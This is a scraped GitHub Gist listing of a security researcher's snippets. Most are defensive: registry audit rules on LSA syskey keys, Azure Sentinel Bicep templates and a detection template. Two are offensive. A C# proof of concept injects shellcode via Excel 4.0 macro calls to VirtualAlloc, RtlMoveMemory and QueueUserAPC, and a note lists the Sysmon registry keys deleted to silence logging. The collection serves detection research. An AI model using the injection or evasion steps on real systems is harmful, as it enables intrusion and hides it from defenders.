Skip to content

Instantly share code, notes, and snippets.

Avatar
🍻
Working from home

Roberto Rodriguez Cyb3rWard0g

🍻
Working from home
1.6k followers · 2 following
View GitHub Profile
@Cyb3rWard0g
Cyb3rWard0g / syskey_registry_keys_sacl_setup.ps1
Created November 20, 2020 09:30
View syskey_registry_keys_sacl_setup.ps1
# Download https://github.com/OTRF/Set-AuditRule/blob/master/Set-AuditRule.ps1
Import-Module .\Set-AuditRule.ps1
$AuditRules = @"
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\JD";"Authenticated Users";"QueryValues";"None";"None";"Success"
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Skew1";"Authenticated Users";"QueryValues";"None";"None";"Success"
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\GBG";"Authenticated Users";"QueryValues";"None";"None";"Success"
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Data";"Authenticated Users";"QueryValues";"None";"None";"Success"
"@
@Cyb3rWard0g
Cyb3rWard0g / poc_blog_code_section.cs
Created September 19, 2020 23:31
View poc_blog_code_section.cs
var memaddr = Convert.ToDouble(excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"VirtualAlloc\\",\\"JJJJJ\\"," + lpAddress + "," + shellcode.Length + ",4096,64)" }));
var startaddr = memaddr;
foreach (var b in shellcode) {
var cb = String.Format("CHAR({0})", b);
var macrocode = "CALL(\\"Kernel32\\",\\"RtlMoveMemory\\",\\"JJCJ\\"," + memaddr + "," + cb + ",1)";
excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { macrocode });
memaddr++;
}
excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"QueueUserAPC\\",\\"JJJJ\\"," + startaddr + ", -2, 0)" });
@Cyb3rWard0g
Cyb3rWard0g / azure_log_analytics_workspace_sentinel.bicep
Last active September 9, 2020 07:13
View azure_log_analytics_workspace_sentinel.bicep
param utcValue string {
default: utcNow()
metadata: {
description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used'
}
}
param workspaceName string {
metadata: {
description: 'Name for the Log Analytics workspace used to aggregate data.'
}
@Cyb3rWard0g
Cyb3rWard0g / azure_bicep_output.bicep
Last active September 9, 2020 06:43
View azure_bicep_output.bicep
output workspaceNameOutput string = uniqueWorkspace
output workspaceIdOutput string = reference(workspace.id, workspace.apiVersion).customerId
output workspacekeyOutput string = listKeys(workspace.id, workspace.apiVersion).primarySharedKey
@Cyb3rWard0g
Cyb3rWard0g / azure_bicep_parameters.bicep
Last active September 9, 2020 06:42
View azure_bicep_parameters.bicep
param utcValue string {
default: utcNow()
metadata: {
description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used'
}
}
param workspaceName string {
metadata: {
description: 'Name for the Log Analytics workspace used to aggregate data.'
}
@Cyb3rWard0g
Cyb3rWard0g / azure_bicep_azure_sentinel_solution.bicep
Last active September 9, 2020 07:09
View azure_bicep_azure_sentinel_solution.bicep
resource azureSentinel 'Microsoft.OperationsManagement/solutions@2015-11-01-preview' = {
name: concat('SecurityInsights(',workspace.name,')') // Implicit Dependency
location: 'eastus'
properties: {
workspaceResourceId: workspace.id
}
plan: {
name: concat('SecurityInsights(',workspace.name,')') // Implicit Dependency
product: 'OMSGallery/SecurityInsights'
publisher: 'Microsoft'
@Cyb3rWard0g
Cyb3rWard0g / azure_bicep_workspace_resource.bicep
Last active September 9, 2020 06:42
View azure_bicep_workspace_resource.bicep
resource workspace 'Microsoft.OperationalInsights/workspaces@2020-03-01-preview' = {
name: 'UniqueWorkspaceName' // must be globally unique
location: 'eastus'
properties: {
sku: {
name: 'PerGB2018'
}
retentionInDays: 30
features: {
immediatePurgeDataOn30Days: true
@Cyb3rWard0g
Cyb3rWard0g / CovenantBinaryPayload.txt
Last active September 1, 2020 13:18
View CovenantBinaryPayload.txt
using System;
using System.Net;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.IO.Pipes;
using System.Reflection;
using System.Collections.Generic;
using System.Security.Cryptography;
@Cyb3rWard0g
Cyb3rWard0g / Mute_Sysmon_initial_nodes.md
Last active July 15, 2020 12:29
View Mute_Sysmon_initial_nodes.md

Registry keys Deleted (Apparently)

  • HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
  • HKLM\System\CurrentControlSet\Control\WMI\Security\08dd09cd-9050-5a49-02f8-46fd443360a8
  • HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\ChannelReferences\0
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\ChannelReferences
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
@Cyb3rWard0g
Cyb3rWard0g / evals_detection_jinja.md
Created June 11, 2020 22:12
View evals_detection_jinja.md

{{renderquery['id']}}

Data Sources

{% for d in renderquery['data_sources'] %}* {{d}}
{% endfor %}

Logic

{{renderquery['logic']}}